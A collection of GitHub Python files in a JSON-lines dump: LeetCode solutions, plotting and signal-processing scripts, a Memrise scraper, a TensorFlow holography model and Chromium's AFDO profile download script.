(e.y() - self.y_move)\n self.change_img()\n self.x_move = e.x()\n self.y_move = e.y()\n\n","repo_name":"yunyuyuan/PyQt5","sub_path":"图片处理/img_label.py","file_name":"img_label.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"40573526931","text":"from typing import List\nfrom collections import defaultdict, Counter\nfrom itertools import chain\n\n\nclass Solution:\n def minJumps(self, arr: List[int]) -> int:\n n = len(arr)\n start, end = 0, n-1\n\n reached, frontier, matches = set(), {start}, defaultdict(list)\n for i, num in enumerate(arr):\n matches[num].append(i)\n\n def next_states(i):\n yield from (j for j in chain([i-1, i+1], matches[arr[i]]) if i != j and 0 <= j < n)\n matches[arr[i]] = []\n\n levels = 0\n while frontier:\n if end in frontier:\n return levels\n newfrontier = {j for i in frontier for j in next_states(i)}\n reached.update(frontier)\n frontier = newfrontier.difference(reached)\n levels += 1\n\n return levels\n ","repo_name":"samiabat/LeetCode-Challenge","sub_path":"1345-jump-game-iv/1345-jump-game-iv.py","file_name":"1345-jump-game-iv.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16218850658","text":"import matplotlib.pyplot as plt\nimport math\nimport numpy\n\n###########################################\ndef ReadDataFromFile(name_of_the_file=\"\"):\n\tx = []\n\ty = []\n\tfile = open(name_of_the_file, \"r\")\n\tcontents = file.readlines()\n\tcounter = 1\n\tfor line in contents:\n\t\tnumbers = line.split(\"\\t\")\n\t\tcounter += 1\n\t\tx.append(float(numbers[0]))\n\t\ty.append(float(numbers[1]))\n\tfile.close()\n\treturn x, y\n###########################################\n\n\"\"\"\nHere we define the files to print\n\"\"\"\n## read first file data\nx1, y1 = ReadDataFromFile(\"data/2w_1e-3.txt\")\nplt.plot(x1, y1, \"g\", label = \"2 Way, dt=1e-3 s\", linewidth=2)\n\nx2, y2 = ReadDataFromFile(\"data/2w_1e-4.txt\")\nplt.plot(x2, y2, \"blue\", label = \"2 Way, dt=1e-4 s\", linewidth=2)\n\nx3, y3 = ReadDataFromFile(\"data/2w_1e-5.txt\")\nplt.plot(x3, y3, \"cyan\", label = \"2 Way, dt=1e-5 s\", linewidth=2)\n\nx3, y3 = ReadDataFromFile(\"data/2w_5e-6.txt\")\nplt.plot(x3, y3, \"black\", label = \"2 Way, dt=5e-6 s\", linewidth=2)\n\n## read first file data\nx1, y1 = ReadDataFromFile(\"data/1w_1e-3.txt\")\nplt.plot(x1, y1, \"g+\", label = \"1 Way, dt=1e-3 s\", linewidth=2)\n\nx2, y2 = ReadDataFromFile(\"data/1w_1e-4.txt\")\nplt.plot(x2, y2, \"b+\", label = \"1 Way, dt=1e-4 s\", linewidth=2)\n\nx3, y3 = ReadDataFromFile(\"data/1w_1e-5.txt\")\nplt.plot(x3, y3, \"c+\", label = \"1 Way, dt=1e-5 s\", linewidth=2)\n\nx3, y3 = ReadDataFromFile(\"data/1w_5e-6.txt\")\nplt.plot(x3, y3, \"k+\", label = \"1 Way, dt=5e-6 s\", linewidth=2)\n\n# markersize=10\n\n# Constant values\n# x = numpy.arange(10,20,0.2)\n# y = 80*numpy.ones(len(x), dtype=float)\n# plt.plot(x, y, \"b-\", label = \"ref_value\", linewidth=2)\n\n\n# Error bar\n#xe, ye = ReadDataFromFile(\"error.txt\")\n#plt.errorbar(xe, ye , label=\"error_bar\", yerr=0.5e4, ecolor=\"lightgrey\", errorevery=1,\n #fmt='grey', capsize=5)\n\n\n#####################################################################\n#####################################################################\n\"\"\"\nHere we set the axes and limits\n\"\"\"\nx_max = 0.22\nx_min = 0.1\ny_max = -5e-2\ny_min = -6.4e-2\nx_interval = 0.02\ny_interval = 0.2e-2\n\nx_ticks = numpy.arange(x_min, x_max, x_interval)\nplt.xticks(x_ticks, fontsize = 12)\n\ny_ticks = numpy.arange(y_min, y_max, y_interval)\nplt.yticks(y_ticks, fontsize = 12)\n\nplt.xlim(x_min, x_max)\nplt.ylim(y_min, y_max)\n\n# plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\nplt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n\n\n#####################################################################\n#####################################################################\n\n\"\"\"\nHere we put the labels and titles of the plot\n\"\"\"\nplt.xlabel('Time [s]', fontsize = 12)\nplt.ylabel('Displacement [m]', fontsize = 12)\n#plt.title('Three point bending', fontsize = 12)\nplt.legend(fontsize = 13)\nplt.grid()\nplt.show()\n\n\n\n\n\n\n#####################################################################\n#####################################################################\n# Settings\n\"\"\"\n'.'\tpoint marker\n','\tpixel marker\n'o'\tcircle marker\n'v'\ttriangle_down marker\n'^'\ttriangle_up marker\n'<'\ttriangle_left marker\n'>'\ttriangle_right marker\n'1'\ttri_down marker\n'2'\ttri_up marker\n'3'\ttri_left marker\n'4'\ttri_right marker\n's'\tsquare marker\n'p'\tpentagon marker\n'*'\tstar marker\n'h'\thexagon1 marker\n'H'\thexagon2 marker\n'+'\tplus marker\n'x'\tx marker\n'D'\tdiamond marker\n'd'\tthin_diamond marker\n'|'\tvline marker\n'_'\thline marker\n\"\"\"\n\n\"\"\"\n'-'\tsolid line style\n'--'\tdashed line style\n'-.'\tdash-dot line style\n':'\tdotted line style\n\"\"\"\n\n\"\"\"\n'b'\tblue\n'g'\tgreen\n'r'\tred\n'c'\tcyan\n'm'\tmagenta\n'y'\tyellow\n'k'\tblack\n'w'\twhite\n\"\"\"\n\n#####################################################################\n#####################################################################","repo_name":"AlejandroCornejo/Suport-Code","sub_path":"plots/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24626370336","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom typing import Any, List, Tuple\nfrom .const import PAGE, LANGCODES\n\n# ******* Function Define ********\n\n# ---------------- Function -----------------------\n# Name: _open_soup(URL)\n# Type: Local function\n# Feature: Return the Soup of the Level or Course URL\n# --------------------------------------------------\n\n\ndef _open_soup(url: str):\n html = requests.get(url)\n soup = BeautifulSoup(html.text, \"html.parser\")\n return soup\n\n\n# ---------------- Function -----------------------\n# Name: _get_name(Tag,Soup)\n# Type: Local function\n# Feature: Return the name of the level or the course\n# --------------------------------------------------\n\n\ndef _get_name(tag_chr: str, soup: BeautifulSoup):\n tag = soup.find(tag_chr)\n # Must be encoded cause tag.text -> return str (UNICODE Python 3)\n name = tag.text.strip()\n return name\n\n\n# ---------------- Function -----------------------\n# Name: _get_words (Soup,CoureID,LevelID)\n# Type: Local function\n# Feature: Return list of record of words in Memrise\n# Format Record : (Word, Meaning, CourseID , LevelID)\n# --------------------------------------------------\n\n\ndef _get_words(\n soup: BeautifulSoup, course_id: Any, level_id: Any\n) -> List[Tuple[Any, Any, Any, Any]]:\n words = []\n meanings = []\n tags = soup(\"div\")\n count = 0\n # Filter with col_a & col_b\n for tag in tags:\n item = tag.get(\"class\")\n if item is None:\n continue\n if \"col_a\" in item:\n words.append(tag.text)\n if \"col_b\" in item:\n count += 1\n meanings.append(tag.text)\n records = list()\n # Get make words in records list: word | meaning | courseID | LevelID\n for i in range(count):\n record = (words[i], meanings[i], course_id, level_id)\n records.append(record)\n return records\n\n\n# ---------------- Function -----------------------\n# Name: _get_language(CourseID)\n# Type: Local function\n# Feature: Return the language name of the course lower\n# Format Record : (Word, Meaning, CourseID , LevelID)\n# --------------------------------------------------\n\n\ndef _get_language_code(soup):\n # url = f\"https://app.memrise.com/course/{courseid}/\"\n # res = requests.get(url)\n # soup = BeautifulSoup(res.text,'html.parser')\n tags = soup(\"a\")\n languages = []\n for tag in tags:\n href = tag[\"href\"]\n if re.match(\"/courses/(.+)/(.+)/\", href):\n text = re.findall(\"[a-z]+/$\", href)\n if len(text) > 0:\n languages.append(text[0][0:-1])\n else:\n # Do nothing\n ...\n language = languages[-1]\n if language == \"us\" or language == \"uk\":\n language = \"english\"\n else:\n # Do nothing\n ...\n return LANGCODES[language]\n\n\n# ******* Class Define **********\n\n# ------------------- Class ----------------------\n# Name: Level\n# Input: (Path,LevelID,CourseID)\n# Path Format: \"/course/{CourseID}/{name-of-course}/{LevelID}/\"\n# Type: Public Class\n# Methods:\n# - `get_words()` -> List[Tuple[Word,Meaning,CourseID,LevelID]]\n# - `get_record()` -> Tuple[CourseID,LevelID,LevelName]\n# -------------------------------------------------\n\n\nclass Level:\n \"\"\"Level of the Memrise course infomation\\n\n Methods:\\n\n - `get_words()` : get all the words in the current level\n - `get_record()` : get the information about the current level\"\"\"\n\n def __init__(self, path, LevelID, CourseID):\n __page_tmp = PAGE + path\n self.__page = __page_tmp\n self.__soup = _open_soup(self.__page)\n __name_tmp = _get_name(\"h3\", self.__soup)\n self.__name = __name_tmp\n self.__words = _get_words(self.__soup, CourseID, LevelID)\n self.__record = tuple([CourseID, LevelID, self.__name])\n\n def get_words(self) -> List[Any]:\n return self.__words\n\n def get_record(self) -> Tuple[Any, ...]:\n return self.__record\n\n\n# ------------------- Class ----------------------\n# Name: Course\n# Input: (CourseID,LanguageID)\n# Type: Public Class\n# Methods:\n# - `get_levels()` -> List[Level]\n# - `get_record()` -> Tuple[CourseID,Name,LanguageID]\n# -------------------------------------------------\n\n\nclass Course:\n \"\"\"Course of Memrise information\\n\n Methods:\\n\n - `get_levels()` : get all the words in the current level\n - `get_record()` : get the information about the current level\"\"\"\n\n def __init__(self, course_id: int):\n __page_tmp = PAGE + \"/course/\" + str(course_id)\n self.__page = __page_tmp\n self.__soup = _open_soup(self.__page)\n self.course_id = course_id\n __name_tmp = _get_name(\"h1\", self.__soup)\n __language = _get_language_code(self.__soup)\n self.__name = __name_tmp\n self.__record = tuple([course_id, self.__name, __language])\n self.__levels = self.__get_levels(self.__soup)\n\n def get_levels(self) -> List[Level]:\n return self.__levels\n\n def __get_levels(self, soup) -> List[Level]:\n # Get all levels with Regular Expression End with \"Digital/\"\n tags = soup(\"a\")\n levels = list()\n expr = \"/(\\\\d)+/$\" # End with \"{digital}/\"\n count = 1\n for tag in tags:\n item = tag.get(\"href\", None)\n if re.search(expr, item) is not None:\n level = Level(item, count, self.course_id)\n levels.append(level)\n count += 1\n return levels\n\n def get_record(self) -> Tuple[Any, ...]:\n return self.__record\n","repo_name":"tquangsdh20/memrise","sub_path":"memrise/extract/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"39169403238","text":"from Graphs_Trees.Graph import Graph\n\nclass UnionFind:\n def __init__(self):\n self.g = Graph()\n bidir = False\n self.g.addEdge(0,1,bidirectional=bidir)\n self.g.addEdge(1,2,bidirectional=bidir)\n self.g.addEdge(2,0,bidirectional=bidir)\n self.parent = [-1] * len(self.g.vertices)\n \n def find(self, i):\n if self.parent[i]==-1:\n return i\n else:\n self.parent[i] = self.find(self.parent[i]) # update the parent on way along to reduce the time complexity of next iterations\n return self.find(self.parent[i])\n \n def find_len(self,x):\n if self.parent[x] == -1:\n return 1\n else:\n return 1+self.find_len(x)\n def union(self,x,y):\n x_parent = self.find(x)\n y_parent = self.find(y)\n #find the length of the tree so that final height is as min as possible to reduce recursions in next iterations\n x_len = self.find_len(x)\n y_len = self.find_len(y)\n if x_len>y_len:\n self.parent[x] = y_parent\n else:\n self.parent[y] = x_parent\n \n def isCyclic(self):\n for i in self.g.graph:\n for j in self.g.graph[i]:\n x = self.find(i)\n y = self.find(j)\n if(x==y):\n return True\n self.union(x, y)\n return False\n \nif __name__==\"__main__\":\n obj = UnionFind()\n print(\"Does not contain cycle\" if obj.isCyclic() is False else \"Contains cycle\")","repo_name":"gmadhwani01/Algorithms-Python","sub_path":"Code/Graphs_Trees/UnionFind.py","file_name":"UnionFind.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13710482148","text":"import numpy as np\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'\nimport tensorflow as tf\nfrom tensorflow.keras import Model, Input, layers\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.applications.vgg19 import VGG19\nfrom tensorflow.keras.applications.vgg19 import preprocess_input\nfrom tensorflow.keras.backend import clear_session\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nfrom utils import _get_input_fn\nfrom datetime import datetime\nfrom tkinter import Tk # from tkinter import Tk for Python 3.x\nfrom tkinter import filedialog\n\nprint(\"Num GPUs Available: \", len(tf.config.experimental.list_physical_devices('GPU')))\nphysical_devices = tf.config.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\ntb_path = \"./logs/\"\n\n\n# tf.compat.v1.enable_eager_execution()\n\nclass CGHNet:\n def __init__(self, dataprovider):\n self.path = Path(os.getcwd())\n self.training_data = dataprovider.get_training_data()\n self._trained = False\n self.dataprovider = dataprovider\n self.lr = dataprovider.lr\n self.phase_factors = dataprovider.phase_factors\n self.input_shape = (self.dataprovider.Mx, self.dataprovider.My, self.dataprovider.My)\n self.model_name = \"MODEL-Mx{}-My{}-nz{}-lp{}-nT{}-bs{}-eps{}\".format(self.dataprovider.Mx,\n self.dataprovider.My,\n self.dataprovider.My,\n self.dataprovider.lp,\n self.dataprovider.nT,\n self.dataprovider.batchsize,\n self.dataprovider.epochs)\n existing_path = self.path / \"saved_models\" / self.model_name\n if os.path.exists(existing_path):\n print(\"Such a model already exists.\")\n new_model_answer = input(\"Would you like to create new model? [y/N] \")\n if new_model_answer == \"y\":\n print(\"Building new model\")\n self.pretrained = False\n self.model = self.build_model()\n else:\n print(\"Loading existing model\")\n root = Tk()\n root.update()\n model_path = filedialog.askdirectory(title=\"Select saved model folder\", initialdir=str(self.path / \"saved_models\"))\n root.destroy()\n self.model = tf.keras.models.load_model(model_path, custom_objects={\"_deinterleave\": self._deinterleave,\n \"_prop_to_slm\": self._prop_to_slm,\n \"_interleave\": self._interleave,\n \"_loss_func\": self._loss_func})\n self.pretrained = True\n else:\n self.pretrained = False\n self.model = self.build_model()\n\n\n def _prop_to_slm(self, inputs):\n # We need to propagate the input backwards to the SLM with ifft2\n real, imag = inputs\n field_z0 = tf.complex(tf.squeeze(real, axis=-1), 0.) * tf.exp(tf.complex(0., tf.squeeze(imag, axis=-1)))\n shift = tf.signal.ifftshift(field_z0, axes=[1, 2])\n #field_slm = tf.signal.ifft2d(shift)\n slm = tf.math.angle(tf.signal.ifft2d(shift))\n return tf.expand_dims(slm, axis=-1)\n\n def _prop_to_planes(self, slm_phase):\n # Then propagate to the z planes we have defined\n phi_slm = tf.complex(np.float32(0.), tf.squeeze(slm_phase, axis=-1))\n phi_slm = tf.math.exp(phi_slm)\n\n output_list = []\n for i, factor in enumerate(self.phase_factors):\n if i != len(self.phase_factors) // 2:\n H = tf.broadcast_to(tf.expand_dims(factor, axis=0), tf.shape(phi_slm))\n phi_slm *= tf.signal.fftshift(H, axes=[1, 2])\n fft = tf.signal.ifftshift(tf.signal.fft2d(tf.signal.fftshift(phi_slm, axes=[1, 2])), axes=[1, 2])\n I = tf.cast(tf.math.square(tf.math.abs(fft)), tf.float32)\n output_list.append(tf.squeeze(I))\n return tf.stack(output_list, axis=-1)\n\n\n def _loss_func(self, y_true, y_pred):\n y_predict = self._prop_to_planes(y_pred)\n num = tf.reduce_sum(y_predict * y_true, axis=[1, 2, 3])\n denom = tf.sqrt(\n tf.reduce_sum(tf.pow(y_predict, 2), axis=[1, 2, 3]) * tf.reduce_sum(tf.pow(y_true, 2), axis=[1, 2, 3]))\n\n sq_err = tf.reduce_mean((num + 1) / (denom + 1), axis=0)\n return 1 - sq_err\n\n # LAYERS\n def _cc_layer(self, n_feature_maps, input):\n x = layers.Conv2D(n_feature_maps, (3, 3), activation='relu', padding='same')(input)\n x = layers.Conv2D(n_feature_maps, (3, 3), activation='relu', padding='same')(x)\n return x\n\n def _cbn_layer(self, n_feature_maps, activation, input):\n if activation == 'tanh' or activation == 'relu':\n x = layers.Conv2D(n_feature_maps, (3, 3), activation=activation, padding='same')(input)\n x = layers.BatchNormalization()(x)\n x = layers.Conv2D(n_feature_maps, (3, 3), activation=activation, padding='same')(x)\n x = layers.BatchNormalization()(x)\n else:\n x = layers.Conv2D(n_feature_maps, (3, 3), activation=None, padding='same')(input)\n x = layers.LeakyReLU(0.2)(x)\n x = layers.BatchNormalization()(x)\n x = layers.Conv2D(n_feature_maps, (3, 3), activation=None, padding='same')(x)\n x = layers.LeakyReLU(0.2)(x)\n x = layers.BatchNormalization()(x)\n return x\n\n def _interleave(self, input):\n return tf.nn.space_to_depth(input=input, block_size=self.dataprovider.IF)\n\n def _deinterleave(self, input):\n return tf.nn.depth_to_space(input=input, block_size=self.dataprovider.IF)\n\n def _target_field(self, init_num_features, input_layer):\n x1 = self._cbn_layer(init_num_features, 'LeakyReLu', input_layer)\n x = layers.MaxPooling2D((2, 2), padding='same')(x1)\n\n x2 = self._cbn_layer(init_num_features * 2, 'LeakyReLu', x)\n x = layers.MaxPooling2D((2, 2), padding='same')(x2)\n\n x3 = self._cbn_layer(init_num_features * 4, 'LeakyReLu', x)\n x = layers.MaxPooling2D((2, 2), padding='same')(x3)\n\n x4 = self._cbn_layer(init_num_features * 8, 'LeakyReLu', x)\n x = layers.MaxPooling2D((2, 2), padding='same')(x4)\n\n x5 = self._cbn_layer(init_num_features * 16, 'relu', x)\n x = layers.UpSampling2D()(x5)\n\n concat4 = layers.concatenate([x4, x])\n x6 = self._cbn_layer(init_num_features * 8, 'relu', concat4)\n x = layers.UpSampling2D()(x6)\n\n concat3 = layers.concatenate([x3, x])\n x7 = self._cbn_layer(init_num_features * 4, 'relu', concat3)\n x = layers.UpSampling2D()(x7)\n\n concat2 = layers.concatenate([x2, x])\n x8 = self._cbn_layer(init_num_features * 2, 'relu', concat2)\n x = layers.UpSampling2D()(x8)\n\n concat1 = layers.concatenate([x1, x])\n x9 = self._cbn_layer(init_num_features, 'tanh', concat1)\n\n return x9\n\n def _branching(self, previous, before_unet):\n\n real_branch = self._cc_layer(self.dataprovider.nK, previous)\n real_branch = layers.concatenate([real_branch, before_unet])\n real_branch = layers.Conv2D(self.dataprovider.IF ** 2, (3, 3), activation='relu', padding='same')(real_branch)\n\n imag_branch = self._cc_layer(self.dataprovider.nK, previous)\n imag_branch = layers.concatenate([imag_branch, before_unet])\n imag_branch = layers.Conv2D(self.dataprovider.IF ** 2, (3, 3), activation=None, padding='same')(imag_branch)\n\n de_int_real = layers.Lambda(self._deinterleave, name=\"De-interleave_real\")(real_branch)\n de_int_imag = layers.Lambda(self._deinterleave, name=\"De-interleave_imag\")(imag_branch)\n\n slm_field = layers.Lambda(self._prop_to_slm, name=\"SLM_phase\")([de_int_real, de_int_imag])\n\n return slm_field\n\n def build_model(self):\n inp = Input(shape=(self.dataprovider.Mx,\n self.dataprovider.My,\n self.dataprovider.nz),\n name='Input',\n batch_size=self.dataprovider.batchsize)\n interleaved = layers.Lambda(self._interleave, name=\"interleave\")(inp)\n target_field = self._target_field(self.dataprovider.nK, interleaved)\n slm_phase = self._branching(target_field, interleaved)\n\n model = Model(inp, slm_phase)\n return model\n\n def train_network(self):\n train_dir, val_dir = self.training_data\n train_files = tf.io.gfile.glob(train_dir + \"/file_*.tfrecords\")\n val_files = tf.io.gfile.glob(val_dir + \"/file_*.tfrecords\")\n\n if self.pretrained:\n answer = input(\"Are you sure you want to train this model again? [y/n]\")\n if answer != 'y':\n return\n\n early_stop = tf.keras.callbacks.EarlyStopping(monitor='loss', min_delta=0.0005, patience=3, mode=\"min\")\n\n self.model.compile(\n loss=self._loss_func,\n optimizer=tf.keras.optimizers.Adam(learning_rate=self.lr),\n )\n\n train_input_fn = _get_input_fn(filenames=train_files, epochs=self.dataprovider.epochs, batchsize=self.dataprovider.batchsize, shape=self.input_shape)\n eval_input_fn = _get_input_fn(filenames=val_files, epochs=self.dataprovider.epochs, batchsize=self.dataprovider.batchsize, shape=self.input_shape)\n training_history = self.model.fit(\n train_input_fn,\n epochs=self.dataprovider.epochs,\n validation_data=eval_input_fn,\n steps_per_epoch=self.dataprovider.nT // self.dataprovider.batchsize,\n callbacks=[early_stop]\n )\n return self.params\n\n def save_model(self, model_path=None):\n model_path = model_path if model_path is not None else self.model_name\n existing_path = self.path / \"saved_models\" / model_path\n if os.path.exists(existing_path):\n now = datetime.now()\n model_name = self.model_name + now.strftime(\"%m/%d/%Y-%H:%M:%S\")\n else:\n model_name = self.model_name\n model_save_path = self.path / \"saved_models\" / model_name\n self.model.save(model_save_path)\n print(\"Model was saved\")\n\n def get_hologram(self, target):\n print(\"Generating hologram\")\n return self.model(target)\n\n\n\n\n# ---- COMPLEXITY OF PRIMITIVES ---- #\ndef conv2d_cx(cx, w_in, w_out, k, stride=1, groups=1):\n h, w, flops, params, acts = cx[\"h\"], cx[\"w\"], cx[\"flops\"], cx[\"params\"], cx[\"acts\"]\n h, w = (h - 1) // stride + 1, (w - 1) // stride + 1\n flops += k * k * w_in * w_out * h * w // groups\n params += k * k * w_in * w_out // groups\n acts += w_out * h * w\n return {\"h\": h, \"w\": w, \"flops\": flops, \"params\": params, \"acts\": acts}\n\n\ndef batchnorm2d_cx(cx, w_in):\n h, w, flops, params, acts = cx[\"h\"], cx[\"w\"], cx[\"flops\"], cx[\"params\"], cx[\"acts\"]\n params += 2 * w_in\n return {\"h\": h, \"w\": w, \"flops\": flops, \"params\": params, \"acts\": acts}\n\n","repo_name":"Andreasgejlm/SingleCGHModel","sub_path":"CGHModel/CGHModel.py","file_name":"CGHModel.py","file_ext":"py","file_size_in_byte":11506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32610916930","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\n# mean and standard deviation\nmean, sigma = 0, 0.1 \nsr = 8000\ntime_s = 5\nsine_freq = 1000\nsig_amp = 0.0001\nsample = sr * time_s\n\n#파이썬은 입력 값이 -1~1 사이로 계산되기 때문에 계수 값을 매우 작게 설정해야 한다.\n#그러나, 값들을 직관적으로 보기 위해 short의 max+1 값을 곱하거나 나누어 사용하였다. \nshort_max = 32768\n\n# 5초짜리 화이트 노이즈 생성\ns = sig_amp*np.random.normal(mean, sigma, sample) * short_max\nplt.plot(s)\nplt.show()\n\n# 5초짜리 1000Hz 톤 신호 생성\nx = np.arange(sample)\ny = sig_amp*np.sin(2 * np.pi * sine_freq * x / sr) * short_max\nplt.plot(x[0:100], y[0:100])\nplt.show()\n\n# 두 신호를 합성\ntone_white = y+s \n\n#FFT\nimport librosa\nimport scipy.signal as signal\nimport librosa.display\nimport numpy as np\n\n#normalize_function\nmin_level_db = -100\ndef _normalize(S):\n return np.clip((S-min_level_db)/(-min_level_db), 0, 1)\n\namplitude = np.abs(librosa.stft(tone_white/short_max, n_fft=1024, hop_length=512,\n win_length = 1024, window=signal.hann))\nmag_db = librosa.amplitude_to_db(amplitude)\nmag_n = _normalize(mag_db)\nlibrosa.display.specshow(mag_n, y_axis='linear', x_axis='time')\nplt.show()\n\n#LMS 알고리즘 적용\nlms_size = 16\nstep_size = 0.0025\nN = len(tone_white)-lms_size+1\n\nfilter_w = np.zeros(lms_size) \nfilterout_y = np.zeros(N)\nerr = np.zeros(N)\nfor n in range(N):\n x_in = tone_white[n:n+lms_size]\n filterout_y[n] = np.dot(x_in, filter_w.T)\n err[n] = tone_white[n + lms_size -1] - filterout_y[n]\n # 작거나 0인 값이 나오면 결과값이 이상하게 출력된다. 이를 방지하기 위해 10을 더해준다.\n sum_val = sum(x_in) + 10\n filter_w = filter_w + step_size * err[n] * (x_in / sum_val)\n\namplitude = np.abs(librosa.stft(err/short_max, n_fft=1024, hop_length=512, win_length = 1024, window=signal.hann))\nmag_db = librosa.amplitude_to_db(amplitude)\nmag_n = _normalize(mag_db)\nlibrosa.display.specshow(mag_n, y_axis='linear', x_axis='time')\nplt.show()\n","repo_name":"Capstone-design2-AIS/git-project","sub_path":"음성인식 실험-1/sound - 6.py","file_name":"sound - 6.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26725113628","text":"import turtle as t\n\nt.bgcolor('black')\ncolors =('cyan','red','blue','violet')\nt.speed(0)\nfor i in range(60):\n t.pencolor(colors[i%4])\n t.width(2)\n t.forward(i)\n t.circle(90,steps=5)\n t.forward(i)\n t.right(45)\nt.hideturtle()\nt.done()","repo_name":"NitulKalita/PythonTurtle","sub_path":"design with pentagons.py","file_name":"design with pentagons.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"12826343705","text":"import argparse\nimport contextlib\nimport os\nimport subprocess\nimport sys\nimport urllib2\n\nGS_BASE_URL = 'https://storage.googleapis.com/chromeos-prebuilt/afdo-job/llvm'\nPROFILE_DIRECTORY = os.path.abspath(os.path.dirname(__file__))\nLOCAL_PROFILE_PATH = os.path.join(PROFILE_DIRECTORY, 'afdo.prof')\n\n# We use these to track the local profile; newest.txt is owned by git and tracks\n# the name of the newest profile we should pull, and local.txt is the most\n# recent profile we've successfully pulled.\nNEWEST_PROFILE_NAME_PATH = os.path.join(PROFILE_DIRECTORY, 'newest.txt')\nLOCAL_PROFILE_NAME_PATH = os.path.join(PROFILE_DIRECTORY, 'local.txt')\n\n\ndef ReadUpToDateProfileName():\n with open(NEWEST_PROFILE_NAME_PATH) as f:\n return f.read().strip()\n\n\ndef ReadLocalProfileName():\n try:\n with open(LOCAL_PROFILE_NAME_PATH) as f:\n return f.read().strip()\n except IOError:\n # Assume it either didn't exist, or we couldn't read it. In either case, we\n # should probably grab a new profile (and, in doing so, make this file sane\n # again)\n return None\n\n\ndef WriteLocalProfileName(name):\n with open(LOCAL_PROFILE_NAME_PATH, 'w') as f:\n f.write(name)\n\n\ndef CheckCallOrExit(cmd):\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = proc.communicate()\n exit_code = proc.wait()\n if not exit_code:\n return\n\n complaint_lines = [\n '## %s failed with exit code %d' % (cmd[0], exit_code),\n '## Full command: %s' % cmd,\n '## Stdout:\\n' + stdout,\n '## Stderr:\\n' + stderr,\n ]\n print >>sys.stderr, '\\n'.join(complaint_lines)\n sys.exit(1)\n\n\ndef RetrieveProfile(desired_profile_name, out_path):\n # vpython is > python 2.7.9, so we can expect urllib to validate HTTPS certs\n # properly.\n ext = os.path.splitext(desired_profile_name)[1]\n compressed_path = out_path + ext\n gs_url = GS_BASE_URL + '/' + desired_profile_name\n with contextlib.closing(urllib2.urlopen(gs_url)) as u:\n with open(compressed_path, 'wb') as f:\n while True:\n buf = u.read(4096)\n if not buf:\n break\n f.write(buf)\n\n if ext == '.bz2':\n # NOTE: we can't use Python's bzip module, since it doesn't support\n # multi-stream bzip files. It will silently succeed and give us a garbage\n # profile.\n # bzip2 removes the compressed file on success.\n CheckCallOrExit(['bzip2', '-d', compressed_path])\n elif ext == '.xz':\n # ...And we can't use the `lzma` module, since it was introduced in python3.\n # xz removes the compressed file on success.\n CheckCallOrExit(['xz', '-d', compressed_path])\n else:\n # Wait until after downloading the file to check the file extension, so the\n # user has something usable locally if the file extension is unrecognized.\n raise ValueError(\n 'Only bz2 and xz extensions are supported; \"%s\" is not' % ext)\n\n\ndef CleanProfilesDirectory():\n # Start with a clean slate, removing old profiles/downloads/etc.\n old_artifacts = (p for p in os.listdir(PROFILE_DIRECTORY) if\n p.startswith('chromeos-chrome-'))\n for artifact in old_artifacts:\n os.remove(os.path.join(PROFILE_DIRECTORY, artifact))\n\n\ndef main():\n parser = argparse.ArgumentParser('Downloads profiles provided by Chrome OS')\n parser.add_argument('-f', '--force', action='store_true',\n help='Fetch a profile even if the local one is current')\n args = parser.parse_args()\n\n up_to_date_profile = ReadUpToDateProfileName()\n if not args.force:\n local_profile_name = ReadLocalProfileName()\n # In a perfect world, the local profile should always exist if we\n # successfully read local_profile_name. If it's gone, though, the user\n # probably removed it as a way to get us to download it again.\n if local_profile_name == up_to_date_profile \\\n and os.path.exists(LOCAL_PROFILE_PATH):\n return 0\n\n CleanProfilesDirectory()\n\n new_tmpfile = LOCAL_PROFILE_PATH + '.new'\n RetrieveProfile(up_to_date_profile, new_tmpfile)\n os.rename(new_tmpfile, LOCAL_PROFILE_PATH)\n WriteLocalProfileName(up_to_date_profile)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"kiwibrowser/src","sub_path":"chrome/android/profiles/update_afdo_profile.py","file_name":"update_afdo_profile.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"73434879524","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def hasPathSum(self, root: TreeNode, s: int) -> bool:\n \n if not root:\n return False\n \n ans = 0\n \n sub = s - root.val\n \n if(sub == 0 and root.left == None and root.right == None):\n return True\n \n if root.left is not None:\n ans = ans or self.hasPathSum(root.left, sub)\n if root.right is not None:\n ans = ans or self.hasPathSum(root.right, sub)\n \n return ans\n \n \n ","repo_name":"bharat787/DSA","sub_path":"LC/hasPathSum.py","file_name":"hasPathSum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 